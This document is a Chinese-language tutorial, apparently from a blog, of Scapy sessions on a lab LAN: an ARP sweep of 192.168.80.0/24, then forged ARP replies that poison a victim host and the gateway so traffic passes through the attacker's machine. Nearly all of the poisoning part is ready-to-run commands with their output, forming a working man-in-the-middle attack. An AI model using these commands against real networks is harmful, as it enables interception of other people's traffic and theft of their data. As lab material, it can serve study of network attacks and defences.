1、局域网Arp扫描：
1） 简单实现：（复杂实现定义为方法别人可以自动实现获取自己IP地址所在段或者直接定义循环IP地址）

>>arp2=srp(Ether(dst='FF:FF:FF:FF:FF:FF')/ARP(op=1,hwdst='00:00:00:00:00:00',pdst='192.168.80.0/24'))
Begin emission:
***Finished to send 256 packets.
................................................^C（复杂实现定义什么时候停止）
>> print(arp2[0].show())
0000 Ether / ARP who has 192.168.80.1 says 192.168.80.250 ==> Ether / ARP is at 00:50:56:c0:00:08 says 192.168.80.1 / Padding
0001 Ether / ARP who has 192.168.80.2 says 192.168.80.250 ==> Ether / ARP is at 00:50:56:ef:49:1f says 192.168.80.2 / Padding
0002 Ether / ARP who has 192.168.80.251 says 192.168.80.250 ==> Ether / ARP is at 00:0c:29:21:fd:03 says 192.168.80.251 / Padding
2） 拆开看数据包192.168.80.251的字段：
>> print(arp2[0].res[2][1].fields)（复杂实现查看字段自动提取）
{'src': '00:0c:29:21:fd:03', 'dst': '00:0c:29:e2:bb:15', 'type': 2054}
>> print(arp2[0].res[2][1].show())（复杂实现查看字段自动提取）
###[ Ethernet ]###
dst= 00:0c:29:e2:bb:15
src= 00:0c:29:21:fd:03
type= 0x806
###[ ARP ]###
hwtype= 0x1
ptype= 0x800
hwlen= 6
plen= 4
op= is-at
hwsrc= 00:0c:29:21:fd:03
psrc= 192.168.80.251
hwdst= 00:0c:29:e2:bb:15
pdst= 192.168.80.250

None
2、ARP spoof（arp毒化）
1）毒化192.168.80.251主机（告诉它网关mac是***者的mac地址）：
192.168.80.1 mac地址为00:50:56:c0:00:08（网关）
192.168.80.250 mac地址为00:0c:29:e2:bb:15（***者）
192.168.80.251 mac地址为00:0c:29:21:fd:03（被***者）

>>arp3=(Ether(dst='00:0c:29:21:fd:03')/ARP(op=2,hwsrc='00:0c:29:e2:bb:15',hwdst='00:0c:29:21:fd:03',psrc='192.168.80.1',pdst='192.168.80.251'))
>> arp3.show()
###[ Ethernet ]###
dst= 00:0c:29:21:fd:03
src= '00:0c:29:e2:bb:15'
type= 0x806
###[ ARP ]###
hwtype= 0x1
ptype= 0x800
hwlen= 6
plen= 4
op= is-at
hwsrc= 00:0c:29:e2:bb:15
psrc= 192.168.80.1
hwdst= 00:0c:29:21:fd:03
pdst= 192.168.80.251
>>arp3=srp(Ether(dst='00:0c:29:21:fd:03')/ARP(op=2,hwsrc='00:0c:29:e2:bb:15',hwdst='00:0c:29:21:fd:03',psrc='192.168.80.1',pdst='192.168.80.251'))
Begin emission:
Finished to send 1 packets.
....^C

3） 毒化网关（告诉网关192.168.80.1主机192.168.80.251 mac地址为***者mac）:

>>arp4=(Ether(dst='00:50:56:c0:00:08')/ARP(op=2,hwsrc='00:0c:29:e2:bb:15',hwdst='00:50:56:c0:00:08',psrc='192.168.80.251',pdst='192.168.80.1'))
>> arp4.show()
###[ Ethernet ]###
dst= 00:50:56:c0:00:08
src= 00:0c:29:e2:bb:15
type= 0x806
###[ ARP ]###
hwtype= 0x1
ptype= 0x800
hwlen= 6
plen= 4
op= is-at
hwsrc= 00:0c:29:e2:bb:15
psrc= 192.168.80.251
hwdst= 00:50:56:c0:00:08
pdst= 192.168.80.1

>>arp4=srp(Ether(dst='00:50:56:c0:00:08')/ARP(op=2,hwsrc='00:0c:29:e2:bb:15',hwdst='00:50:56:c0:00:08',psrc='192.168.80.251',pdst='192.168.80.1'))
Begin emission:
Finished to send 1 packets.
........^C